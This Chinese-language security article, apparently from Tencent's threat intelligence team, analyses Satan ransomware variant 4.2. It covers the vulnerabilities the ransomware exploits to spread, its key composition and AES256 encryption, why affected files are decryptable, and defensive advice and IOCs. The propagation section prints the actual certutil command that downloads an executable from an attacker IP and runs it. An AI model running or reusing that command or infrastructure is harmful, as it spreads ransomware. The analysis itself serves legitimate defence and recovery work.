freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    撒旦(Satan)勒索病毒最新变种(4.2)加解密分析
    2018-10-22 09:37:23
    所属地 广东省

    一、概述
    近日,腾讯御见威胁情报中心检测到一大批的服务器被入侵,入侵后被植入勒索病毒。经过分析确认,植入的勒索病毒为最新的Satan 4.2勒索病毒。

    御见威胁情报中心长期跟踪撒旦(Satan)勒索病毒的变化,并多次对外发布过撒旦(Satan)勒索病毒的分析文章。本次捕捉到的最新变种4.2版,传播方式跟之前的版本并未有太多的变化,但是加密部分发生了变化,会导致之前版本的解密工具失效。

    通过技术分析确认,撒旦(Satan)勒索病毒4.2变种将密钥硬编码在病毒及加密后的文件中,因此被撒旦(Satan)勒索病毒加密的文件可以被解密。腾讯御见威胁中心已紧急更新了解密程序,供被勒索的用户恢复被加密的文件。受害用户只须启动腾讯电脑管家中的“文档守护者”,点击文档解密,即可根据提示修复被撒旦(Satan)勒索病毒加密的文档。

    二、传播分析
    新捕捉到的样本,传播部分跟之前变化不大,依然集成了利用各种漏洞(包括永恒之蓝和其他服务器组件的漏洞)来进行攻击传播。攻击示意图如下:

    撒旦(Satan)勒索病毒利用的漏洞工具包括:

    • 永恒之蓝

    • JBoss反序列化漏洞(CVE-2017-12149)

    • JBoss默认配置漏洞(CVE-2010-0738)

    • Tomcat任意文件上传漏洞(CVE-2017-12615)

    • Tomcat web管理后台弱口令爆破

    • Weblogic WLS 组件漏洞(CVE-2017-10271)

    具体的扫描和入侵部分分析请参见之前的分析文章《撒旦(Satan)勒索蠕虫最新变种攻击方式解析》

    入侵成功后,会执行命令行下载病毒文件,继续扫描和入侵其他的机器并执行勒索病毒。执行的命令行为:

    cmd.exe /c certutil.exe -urlcache -split -f http://45.77.175.225/cab/sts.exe c:/dbg.exe&&cmd.exe /c  c:/dbg.exe

    三、勒索病毒加解密分析
    本次的变种变化较大的为勒索病毒的加密部分,因此本文着重介绍下最新变种的加密算法部分。

    1、加密密钥的组成变化
    Satan 3.1的加密密钥组成为:[HardWareID]+[STR]+[PUBLIC]
    Satan 3.3的加密密钥组成为:[HardWareID]+[HEX_STR]+[PUBLIC]

    最新的Satan 4.2的加密密钥组成为:[HardWareID]+[PUBLIC]+[HEX_STR]+[STR]

    不仅密钥的组成因子变多,且顺序跟之前也发生了改变。

    新版的密钥组成:

    其中,[HardWareID]和[PUBLIC]会被随机计算出来,并且会写在被加密的文件尾部。  

    而HEX_STR和STR则是硬编码在病毒的加密部分中:

    2、加密算法的变化
    跟旧版撒旦(Satan)勒索病毒一样,最新4.2版的撒旦(Satan)勒索病毒为了加快加密速度,依然会对不同大小和不同文件类型的文件采取不同的加密策略,不同的是加密的方法不再是前二分之一 、前五分之一。最新的加密方式如下:

    病毒会根据文件的后缀名进行完全加密和不完全加密,当文件后缀名符合规定的后缀名时采取完全加密。相关后缀名如下:

    "txt", "sql", "zip", "php", "asp", "jsp", "cpp", "ini", "aspx", "cs", "py", "h", "vbs", "bat", "conf", "sh", "inc", "e", "c", "pl", "csv", "asm", "doc", "docx", "xls", "xlsx", "ppt"


    当文件的后缀名不符合规定的文件名时,则根据文件大小进行加密:
    1)当文件大小大于100000000字节时,则采取每加密16字节后则随后的4x16字节不加密;

    2)当文件大小小于等于100000000字节时,则采取每加密16字节后随后的16字节不加密。

    比如文件大小小于100000000字节的rar文件,被加密后的文件内容情况如下:

    这种加密方式虽然加密的方法和旧版本不同,但是同样做到了加密整体文件的二分之一 、五分之一。

    而最后采用的加密算法不再是旧版本中使用的RC4加密算法,而是AES256 ECB加密。

    加密后在目录下生成解密提示文本内容如下:

    加密后的文件名变为[sicck@protonmail.com]文件名.sicck:

    至于解密部分,由于AES256是对称加密算法,而密钥组成部分硬编码在病毒文件和加密后的文件中,因此撒旦(Satan)勒索病毒完全可以被解密。

    解密方法只要从加密后文件的末尾提取HardWareID和PUBLIC,然后在病毒体中提取的HEX_STR和STR,组成AES256的key,即可用来解密加密后的文件。

    腾讯御点和腾讯电脑管家更新了Satan的解密工具,使用腾讯电脑管家文档守护者中的文档解密功能即可解密成功。

    若有中该勒索病毒的用户和无法使用该工具解密的用户,请联系我们官方人员,协助进行解密。 

    四、安全建议

    腾讯御见威胁情报中心提醒用户注意以下几点,防御勒索病毒攻击:
    1、服务器关闭不必要的端口,方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
    2、使用腾讯御点(个人用户可使用腾讯电脑管家)的漏洞修复功能,及时修复系统高危漏洞;
    3、服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
    4、推荐企业用户使用腾讯御点(下载地址:https://s.tencent.com/product/yd/index.html),个人用户使用腾讯电脑管家,拦截可能的病毒攻击。

    五、附录(IOCs)

    MD5
    baee51016c9dc0e9083fe92acab9c1a3
    684d6a72c480febbc16482ab0e70e11f
    ddf1025f2cc06aeb6ccc4d161b281f72


    URL
    http://45.77.175.225/cab/conn.exe
    http://45.77.175.225/cab/muc.exe
    http://45.77.175.225/cab/fast.exe
    http://45.77.175.225/cab/sts.exe

    Domain
    v225.23aq.com
    www.libra2018.tk
    www.xw7s.top

    参考链接:

    湖北某医院遭撒旦(Satan)勒索病毒袭击,腾讯御点解密成功,重要数据已恢复

    撒旦(Satan)勒索蠕虫最新变种攻击方式解析

    魔鬼撒旦(Satan)勒索病毒携永恒之蓝卷土重来 主攻数据库

    # 腾讯电脑管家 # 勒索病毒 # Satan
    本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者